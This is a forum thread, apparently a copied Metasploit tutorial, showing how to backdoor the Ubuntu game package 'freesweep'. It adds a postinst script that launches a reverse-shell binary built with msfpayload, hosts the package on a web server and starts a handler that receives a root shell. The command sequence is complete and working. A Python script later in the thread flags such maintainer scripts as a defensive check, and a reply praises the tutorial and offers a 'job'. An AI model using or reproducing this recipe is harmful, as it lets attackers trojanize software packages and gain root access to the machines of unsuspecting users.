Binary Linux Trojans
  • The-Force
    Posts: 15
    In order to demonstrate that client-side attacks and trojans are not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux.
    An excellent video was made by Redmeat_uk demonstrating this technique that you can view at:

    http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx


    We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package 'freesweep', a text-based version of Mine Sweeper.

    root@bt4:/pentest/exploits/framework3# apt-get --download-only install freesweep
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    ...snip...
    root@bt4:/pentest/exploits/framework3# mkdir /tmp/evil
    root@bt4:/pentest/exploits/framework3# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
    root@bt4:/pentest/exploits/framework3# cd /tmp/evil/
    root@bt4:/tmp/evil#


    Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added "features".

    root@v-bt4-pre:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work
    root@v-bt4-pre:/tmp/evil# mkdir work/DEBIAN


    In the 'DEBIAN' directory, create a file named 'control' that contains the following:

    root@bt4:/tmp/evil/work/DEBIAN# cat control
    Package: freesweep
    Version: 0.90-1
    Section: Games and Amusement
    Priority: optional
    Architecture: i386
    Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
    Description: a text-based minesweeper
    Freesweep is an implementation of the popular minesweeper game, where
    one tries to find all the mines without igniting any, based on hints given
    by the computer. Unlike most implementations of this game, Freesweep
    works in any visual text display - in Linux console, in an xterm, and in
    most text-based terminals currently in use.


    We also need to create a post-installation script that will execute our binary. In our 'DEBIAN' directory, we'll create a file named 'postinst' that contains the following:

    root@bt4:/tmp/evil/work/DEBIAN# cat postinst
    #!/bin/sh

    sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &


    Now we'll create our malicious payload. We'll be creating a reverse shell to connect back to us named 'freesweep_scores'.

    root@bt4:/pentest/exploits/framework3# ./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores
    Created by msfpayload (http://www.metasploit.com).
    Payload: linux/x86/shell/reverse_tcp
    Length: 50
    Options: LHOST=192.168.1.101,LPORT=443


    We'll now make our post-installation script executable and build our new package. The built file will be named 'work.deb' so we will want to change that to 'freesweep.deb' and copy the package to our web root directory.

    root@bt4:/tmp/evil/work/DEBIAN# chmod 755 postinst
    root@bt4:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
    dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.
    root@bt4:/tmp/evil# mv work.deb freesweep.deb
    root@bt4:/tmp/evil# cp freesweep.deb /var/www/


    If it is not already running, we'll need to start the Apache web server.

    root@bt4:/tmp/evil# /etc/init.d/apache2 start


    We will need to set up the Metasploit multi/handler to receive the incoming connection.

    root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 E
    [*] Please wait while we load the module tree...
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler...


    On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game.

    ubuntu@ubuntu:~$ wget http://192.168.1.101/freesweep.deb
    ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb



    As the victim installs and plays our game, we have received a shell.

    [*] Sending stage (36 bytes)
    [*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129)

    ifconfig
    eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
    inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:49 errors:0 dropped:0 overruns:0 frame:0
    TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
    Interrupt:17 Base address:0x1400
    ...snip...

    hostname
    ubuntu
    id
    uid=0(root) gid=0(root) groups=0(root)


    cheers...
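Before `sudo dpkg -i` hands root to a package fetched from a stranger's web root, a defender can pull the maintainer scripts out of the .deb and flag the things the postinst above relies on: a lone `&` backgrounding a process, a setgid `chmod`, and `sudo`. This is an added example, not code from the original post or from Metasploit; `build_sample_deb` is constructed test input (no data.tar) and the `RISKY` patterns are assumed heuristics, not an exhaustive check.

```python
import io
import re
import tarfile

MAINT_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
RISKY = {  # label -> regex; tuned to the postinst shown in the post (assumed heuristics)
    "backgrounds a process": re.compile(r"(?<![&>])&(?!&)"),  # lone '&', not '&&' or '2>&1'
    "sets setuid/setgid bits": re.compile(r"chmod\s+(?:[0-7]?[2467][0-7]{3}\b|\S*[ug]\+s)"),
    "calls sudo": re.compile(r"\bsudo\b"),
}

def ar_members(blob: bytes):  # walk the ar(1) container every .deb uses: 8-byte magic, 60-byte headers
    assert blob[:8] == b"!<arch>\n", "not an ar archive"
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        name = hdr[:16].decode().strip().rstrip("/")  # GNU ar may append '/'
        size = int(hdr[48:58].decode())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)  # members are 2-byte aligned

def maintainer_scripts(deb: bytes) -> dict:
    """Return {name: text} for maintainer scripts in control.tar.* (gz/xz/bz2; not zstd)."""
    found = {}
    for name, data in ar_members(deb):
        if name.startswith("control.tar"):
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
                for m in tf.getmembers():
                    base = m.name.rsplit("/", 1)[-1]
                    if m.isfile() and base in MAINT_SCRIPTS:
                        found[base] = tf.extractfile(m).read().decode(errors="replace")
    return found

def audit_script(text: str) -> list:  # labels of every RISKY pattern found in the script
    return [label for label, rx in RISKY.items() if rx.search(text)]

def build_sample_deb() -> bytes:  # constructed test input: minimal .deb, postinst as in the post
    postinst = (b"#!/bin/sh\n\nsudo chmod 2755 /usr/games/freesweep_scores && "
                b"/usr/games/freesweep_scores & /usr/games/freesweep &\n")
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for fname, content in (("control", b"Package: freesweep\n"), ("postinst", postinst)):
            info = tarfile.TarInfo("./" + fname)
            info.size, info.mode = len(content), 0o755
            tf.addfile(info, io.BytesIO(content))
    out = b"!<arch>\n"  # then per member a 60-byte header: name16 mtime12 uid6 gid6 mode8 size10 magic2
    for mname, data in (("debian-binary", b"2.0\n"), ("control.tar.gz", buf.getvalue())):
        out += f"{mname:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}".encode() + b"`\n"
        out += data + (b"\n" if len(data) & 1 else b"")
    return out
```

On a real package, `dpkg-deb -e freesweep.deb out/` extracts the same control directory for manual review; run `audit_script` on anything it contains before installing.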
  • Xin
    Posts: 3,251
    Great tutorial again, Force. I need your MSN so we can sort out a job for you :)
    Xin